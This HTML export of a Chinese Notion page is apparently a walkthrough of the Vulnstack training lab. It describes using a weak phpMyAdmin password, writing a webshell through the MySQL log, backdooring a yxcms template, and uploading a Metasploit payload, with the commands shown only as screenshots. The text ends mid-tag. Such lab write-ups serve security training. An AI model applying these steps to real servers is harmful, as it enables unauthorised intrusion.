href="https://alexjakin.github.io/2023/05/01/hongrivulnstackanquanshizhanbachang/#toc-heading-16">红日(vulnstack)安全实战靶场 | Justin博客 (alexjakin.github.io)</a></div><div class="notion-text notion-block-19707f613c774dafbf55c38134d4d6f2"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://zhuanlan.zhihu.com/p/68927033">msf手册 - 知乎 (zhihu.com)</a></div><div class="notion-text notion-block-4bb98f6998f042d28c11b6cba1ac1cfc"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://www.wangan.com/p/7fy7f8a17c02128d#%E7%AC%AC%E4%B8%89%E5%B1%82%E7%BD%91%E7%BB%9C">三层网络靶场搭建&amp;MSF内网渗透 - 网安 (wangan.com)</a></div><div class="notion-text notion-block-e97b1b865df0446dae94489c69a70448"><a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://mp.weixin.qq.com/s/A3MIuT7RXTIIPNLjF42OTg">实战 ｜ 记一次基础的内网Vulnstack靶机渗透一 (qq.com)</a></div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-f1d049d8d602425f9bc785f7f90f0b2c" data-id="f1d049d8d602425f9bc785f7f90f0b2c"><span><div id="f1d049d8d602425f9bc785f7f90f0b2c" class="notion-header-anchor"></div><a class="notion-hash-link" href="#f1d049d8d602425f9bc785f7f90f0b2c" title="主机发现"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">主机发现</span></span></h3><div class="notion-text notion-block-b0973b4dfc1b4446b1795b36225db828">受害主机:                     192.128.52.128</div><div class="notion-text notion-block-f581e05021e24103844a562c8cb35d2d">kali:                                  192.128.52.129</div><div class="notion-text notion-block-1c7a08994a5548ae80d23afb1c9836d8">win攻击机：               192.128.52.133 （192.168.235.145）</div><div class="notion-text notion-block-b4a67cba1c71402f8a87217a46858bfb">ubuntu攻击机器：  192.128.235.149</div><div class="notion-blank notion-block-d77b6493f75448c9959e5cef0c0e7929"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-8536e565e6c142e4b8de3623d78ac41d" data-id="8536e565e6c142e4b8de3623d78ac41d"><span><div id="8536e565e6c142e4b8de3623d78ac41d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#8536e565e6c142e4b8de3623d78ac41d" title="全端口扫描"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">全端口扫描</span></span></h3><div class="notion-blank notion-block-a4b458a7c62d4b38823ac60c1fca4729"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-f0dade1657cc4ffa914978226a2ff57d" data-id="f0dade1657cc4ffa914978226a2ff57d"><span><div id="f0dade1657cc4ffa914978226a2ff57d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#f0dade1657cc4ffa914978226a2ff57d" title="tcp扫描"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">tcp扫描</span></span></h3><div class="notion-blank notion-block-e71870c30238447b82a11f438740f4a2"> </div><div class="notion-blank notion-block-d910a74705bc472a9724244a1f24d551"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-d970c43a1d724988a1bf475c9c1f511a" data-id="d970c43a1d724988a1bf475c9c1f511a"><span><div id="d970c43a1d724988a1bf475c9c1f511a" class="notion-header-anchor"></div><a class="notion-hash-link" href="#d970c43a1d724988a1bf475c9c1f511a" title="udp扫描"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">udp扫描</span></span></h3><div class="notion-blank notion-block-a79209e3a3b6475dbb1c52e542a622ba"> </div><div class="notion-blank notion-block-13326fdb3d7b427bbe16c8001e6b949b"> </div><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-a44a78ffb906416f8e704a90da2d0014" data-id="a44a78ffb906416f8e704a90da2d0014"><span><div id="a44a78ffb906416f8e704a90da2d0014" class="notion-header-anchor"></div><a class="notion-hash-link" href="#a44a78ffb906416f8e704a90da2d0014" title="web服务"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">web服务</span></span></h3><div class="notion-blank notion-block-ed94a3ab71e045b191f38b7f8e88bb94"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-4da45b3ec4b94a4394dccbed0c9bbc45" data-id="4da45b3ec4b94a4394dccbed0c9bbc45"><span><div id="4da45b3ec4b94a4394dccbed0c9bbc45" class="notion-header-anchor"></div><a class="notion-hash-link" href="#4da45b3ec4b94a4394dccbed0c9bbc45" title="后台扫描"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">后台扫描</span></span></h4><div class="notion-blank notion-block-4d0f8fab7ae345d4beee77be7afb637d"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-80a2a502f42645c8a1434d04f26a2228" data-id="80a2a502f42645c8a1434d04f26a2228"><span><div id="80a2a502f42645c8a1434d04f26a2228" class="notion-header-anchor"></div><a class="notion-hash-link" href="#80a2a502f42645c8a1434d04f26a2228" title="php探针：/"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">php探针：/</span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-9055b717979b40958ec7a4eab4b32853"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F8e1ed54d-811f-4a98-9b86-a22f84c4b8a0%2FUntitled.png?table=block&amp;id=9055b717-979b-4095-8ec7-a4eab4b32853&amp;t=9055b717-979b-4095-8ec7-a4eab4b32853&amp;width=1900&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-9c48765c7dfb46f084803f24cbbde9d4"> </div><div class="notion-blank notion-block-ad16d80155734ef485ad1fbd87efcacd"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-b1b23de9f6c54222bdb81a41c6401343" data-id="b1b23de9f6c54222bdb81a41c6401343"><span><div id="b1b23de9f6c54222bdb81a41c6401343" class="notion-header-anchor"></div><a class="notion-hash-link" href="#b1b23de9f6c54222bdb81a41c6401343" title="phpinfo:/phpinfo.php "><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">phpinfo:/phpinfo.php </span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-1db60d776ffe4c5e90863383291e2691"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F590215a7-7547-44e2-8ee7-4f8b089a61c3%2FUntitled.png?table=block&amp;id=1db60d77-6ffe-4c5e-9086-3383291e2691&amp;t=1db60d77-6ffe-4c5e-9086-3383291e2691&amp;width=1153&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-78d0548c600e4a7ea85dfc9f9fdb4aca"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-eb8094999f574bc69fcac098ef6f890e" data-id="eb8094999f574bc69fcac098ef6f890e"><span><div id="eb8094999f574bc69fcac098ef6f890e" class="notion-header-anchor"></div><a class="notion-hash-link" href="#eb8094999f574bc69fcac098ef6f890e" title="phpmyadmin:/phpmyadmin "><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">phpmyadmin:/phpmyadmin </span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-4800f3759a8d43caa04ab95c0fa634f4"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ff62f2578-4d48-4ec5-a8ae-044addc70a9b%2FUntitled.png?table=block&amp;id=4800f375-9a8d-43ca-a04a-b95c0fa634f4&amp;t=4800f375-9a8d-43ca-a04a-b95c0fa634f4&amp;width=865&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-c4b7b52ccdab409db0ec7c27f6a570e2">存在弱口令：root/root  </div><div class="notion-blank notion-block-b6ac4dfddf864a00b1046dcd4c34f326"> </div><div class="notion-text notion-block-514685e8625e42b296ca8b044a53e927">查看是否有文件写入权限</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-e504c94c5f3c4285a1580b1c7a445b4f"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F312dfaeb-569d-4524-a8b9-eeef97481603%2FUntitled.png?table=block&amp;id=e504c94c-5f3c-4285-a158-0b1c7a445b4f&amp;t=e504c94c-5f3c-4285-a158-0b1c7a445b4f&amp;width=2098&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-ccff1c3ef96a4597ab1bbb77958c95b8"> </div><div class="notion-text notion-block-4c1927fd175f409797f231c638063dc0">查看是否有开启日志记录</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-916d565d715a497da2482be72215c173"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:690px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F0e1df842-db52-41a9-b3fc-dcef52e7f1f9%2FUntitled.png?table=block&amp;id=916d565d-715a-497d-a248-2be72215c173&amp;t=916d565d-715a-497d-a248-2be72215c173&amp;width=690&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-d020d6d4aca4483fb9e2bb172dbf64ac">显示未开启</div><div class="notion-blank notion-block-2d708f1375194c18a10b7233a790ff2e"> </div><div class="notion-text notion-block-3b0441a58cf1488ca37968e16b33eaac">手动打开</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-02cebd28c93a444cbc5034c11f6c261a"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:638px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F62e932e3-41c5-48dd-b3fb-f8cd1f4fc337%2FUntitled.png?table=block&amp;id=02cebd28-c93a-444c-bc50-34c11f6c261a&amp;t=02cebd28-c93a-444c-bc50-34c11f6c261a&amp;width=638&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-a84d0042fb5a4b9294ea1f8a9bbed543">修改日志路径</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-7d381ab85dbe47669a6fe11b8aebe819"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F07ca9165-7e5e-4a18-a4f3-fa7f40a4caa1%2FUntitled.png?table=block&amp;id=7d381ab8-5dbe-4766-9a6f-e11b8aebe819&amp;t=7d381ab8-5dbe-4766-9a6f-e11b8aebe819&amp;width=728&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-80adc058a96049978745a4bbb150331e"> </div><div class="notion-text notion-block-ddd240bc535146ae9e7a10278277db8f">访问/test.php</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-1720e1c7c1f042e7bdc70c66b3148e30"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faa953fea-bdfa-471d-9c79-21589c8a2800%2FUntitled.png?table=block&amp;id=1720e1c7-c1f0-42e7-bdc7-0c66b3148e30&amp;t=1720e1c7-c1f0-42e7-bdc7-0c66b3148e30&amp;width=2375&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-blank notion-block-b3462e1363ee436397cdcd177e4cd85a"> </div><div class="notion-text notion-block-11c70d9dd3f0467ba0774405dae43bf2">日志写马</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-4cd41c657bd14ffc8404d887ab7109ae"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F8296ba30-bb20-41d3-b2d9-b4906a9a7fea%2FUntitled.png?table=block&amp;id=4cd41c65-7bd1-4ffc-8404-d887ab7109ae&amp;t=4cd41c65-7bd1-4ffc-8404-d887ab7109ae&amp;width=1433&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-781c9364ea8846fa9b36a43b9c66d0b1">这里其实是已经写进去了，一句话木马的<span class="notion-red">重点在于木马执行</span>，不要看到notice，没显示一句话木马就以为没有成功</div><div class="notion-blank notion-block-4043ffdc246045a2b65a7fd11a60f555"> </div><div class="notion-text notion-block-e287ea3c9f284f019dfc6a56c713fe94">使用蚁剑连接</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-7a42cb4706fa431eb81edba3f06caa17"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F0e261385-6261-4eb0-9843-171cb2d4f6b6%2FUntitled.png?table=block&amp;id=7a42cb47-06fa-431e-b81e-dba3f06caa17&amp;t=7a42cb47-06fa-431e-b81e-dba3f06caa17&amp;width=1542&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-38ce83a5ef8a4b75bad724e0f2e8768f">在这里发现还有个站点yxcms</div><div class="notion-blank notion-block-1ded520db18c44c3bb71edc95031a048"> </div><div class="notion-text notion-block-eff2f0506c394eb39b74a090d69552e2">打开蚁剑终端查看权限</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-39f110405a6d42939234410a577b23c3"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:638px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Ffbc92d51-c572-497b-8d81-35ec58df5c4d%2FUntitled.png?table=block&amp;id=39f11040-5a6d-4293-9234-410a577b23c3&amp;t=39f11040-5a6d-4293-9234-410a577b23c3&amp;width=638&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-bc4c9b8be57149b092cc50e4a96757e2">确认为系统权限</div><div class="notion-blank notion-block-6144827556be4512a5146a796a4d0db4"> </div><h4 class="notion-h notion-h3 notion-h-indent-2 notion-block-01e00d2817704eff83402715b4c9233d" data-id="01e00d2817704eff83402715b4c9233d"><span><div id="01e00d2817704eff83402715b4c9233d" class="notion-header-anchor"></div><a class="notion-hash-link" href="#01e00d2817704eff83402715b4c9233d" title="yxcms：/yxcms"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">yxcms：/yxcms</span></span></h4><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-3106d23375ba4f40865adaf0c4ea9f0f"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fc9945d89-2198-4d85-ba9d-d3850f8e39ee%2FUntitled.png?table=block&amp;id=3106d233-75ba-4f40-865a-daf0c4ea9f0f&amp;t=3106d233-75ba-4f40-865a-daf0c4ea9f0f&amp;width=2418&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-c0f953562ffa4f119c7c47c8d20563fa">文章后台，带默认账号密码</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-66f08cd1273442f9945702f7940642d4"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:522px;max-width:100%;flex-direction:column"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F96b3bf21-008e-404a-b8b3-74aad08c83af%2FUntitled.png?table=block&amp;id=66f08cd1-2734-42f9-9457-02f7940642d4&amp;t=66f08cd1-2734-42f9-9457-02f7940642d4&amp;width=522&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-75484e40651843119f708cb725d31515">后台可以控制模板</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-bc99f19690b543379ed847f90788bdb3"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F0c03dabe-8427-46c1-8084-cf168686c017%2FUntitled.png?table=block&amp;id=bc99f196-90b5-4337-9ed8-47f90788bdb3&amp;t=bc99f196-90b5-4337-9ed8-47f90788bdb3&amp;width=1240&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-103c0575c82c432fa167ab1db7922393">此处可以修改模板代码，插入一句话木马</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-e8080279d1624b76b8e5360a351ffb01"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fb11fb5a6-b7c4-4db0-9a26-16c493c6b119%2FUntitled.png?table=block&amp;id=e8080279-d162-4b76-b8e5-360a351ffb01&amp;t=e8080279-d162-4b76-b8e5-360a351ffb01&amp;width=631&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-bf4cd296f32d4f4fb83f729ab0151b6c"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fdeb1bf19-df92-492b-ab86-fd0f8e400de9%2FUntitled.png?table=block&amp;id=bf4cd296-f32d-4f4f-b83f-729ab0151b6c&amp;t=bf4cd296-f32d-4f4f-b83f-729ab0151b6c&amp;width=973&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-f50262f90cc54449a09608e2fbdea657">结合内容管理找到对应模板代码的位置</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-6576fb4ab3be4171b2230c3638a9be87"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2F9c25972a-42e8-4095-8463-030f2e62edf2%2FUntitled.png?table=block&amp;id=6576fb4a-b3be-4171-b223-0c3638a9be87&amp;t=6576fb4a-b3be-4171-b223-0c3638a9be87&amp;width=817&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-27506fe855574dd4ac20c055b35729e0"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fea81b5b1-4c27-470e-8496-907998fc5611%2FUntitled.png?table=block&amp;id=27506fe8-5557-4dd4-ac20-c055b35729e0&amp;t=27506fe8-5557-4dd4-ac20-c055b35729e0&amp;width=972&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><div class="notion-text notion-block-ce4e05458e2e4f41a37e536d3bb8105f">连接蚁剑</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-a7641a99e9e84af4982ddaf5d79f3ab3"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Faf814bbc-ea5a-4ee8-908b-9c3490d77329%2FUntitled.png?table=block&amp;id=a7641a99-e9e8-4af4-982d-daf5d79f3ab3&amp;t=a7641a99-e9e8-4af4-982d-daf5d79f3ab3&amp;width=1272&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-0017a4aebf854d0d8f481acd450b7376"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" src="https://www.notion.so/image/https%3A%2F%2Fs3-us-west-2.amazonaws.com%2Fsecure.notion-static.com%2Fcb0ad73f-a317-4ac7-989a-22748fac07ff%2FUntitled.png?table=block&amp;id=0017a4ae-bf85-4d0d-8f48-1acd450b7376&amp;t=0017a4ae-bf85-4d0d-8f48-1acd450b7376&amp;width=644&amp;cache=v2" alt="notion image" loading="lazy" decoding="async"/></div></figure><h3 class="notion-h notion-h2 notion-h-indent-1 notion-block-3a5c0e61be404e40a77b1c9f2a35bc2c" data-id="3a5c0e61be404e40a77b1c9f2a35bc2c"><span><div id="3a5c0e61be404e40a77b1c9f2a35bc2c" class="notion-header-anchor"></div><a class="notion-hash-link" href="#3a5c0e61be404e40a77b1c9f2a35bc2c" title="msf马"><svg viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg></a><span class="notion-h-title">msf马</span></span></h3><div class="notion-text notion-block-a8967ec4acb14fa5b206b83309834d26">参考：<a target="_blank" rel="noopener noreferrer" class="notion-link" href="https://zhuanlan.zhihu.com/p/68927033">msf手册 - 知乎 (zhihu.com)</a></div><div class="notion-blank notion-block-e49749334ed14a65944d7bff2b3634b5"> </div><div class="notion-text notion-block-d0a5adb1f3934035ad89ae4f14b7785e">生成木马</div><div class="notion-text notion-block-a9b9463e97a440209ad4e6ad1d0f3791">蚁剑传马并且执行</div><figure class="notion-asset-wrapper notion-asset-wrapper-image notion-block-eef4f754fa694223bd3a8623b1a1e457"><div style="position:relative;display:flex;justify-content:center;align-self:center;width:100%;max-width:100%;flex-direction:column;height:100%"><img style="object-fit:cover" 